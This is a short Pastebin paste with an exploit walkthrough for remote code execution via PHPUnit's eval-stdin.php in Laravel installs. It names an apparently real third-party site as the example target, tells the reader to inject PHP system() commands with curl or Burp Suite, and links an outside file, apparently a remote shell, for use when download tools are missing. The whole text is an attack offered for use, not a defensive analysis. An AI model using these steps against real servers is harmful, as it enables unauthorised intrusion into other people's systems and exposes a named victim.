ToKeiChun

Laravel PHPUnit RCE

Sep 21st, 2019
670
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.69 KB | None | 0 0
  1. laravel phpunit rce
  2.  
  3. PROLOG :
  4. [-] bug on vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  5. [-] use curl or burpsute for execute the file vulnerable
  6.  
  7. POC :
  8. [-] access the file vulnerable on site target.
  9. example : http://click.ecc.ac.jp/ecc/fashion_club/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  10. [-] use curl or reload then listening use burpsuite then u can inject the php code there like <?php system(' -ls la'); or etc
  11. [-] if that site vuln, the target react w/ php code that you run.
  12. EPILOG :
  13. [-] when u cant upload file there, u can search dir w/ readeable permission.
  14. [-] or if u can't use wget or curl or etc, u can use this.
  15. https://khunerable.net/images/3x.txt
Add Comment
Please, Sign In to add comment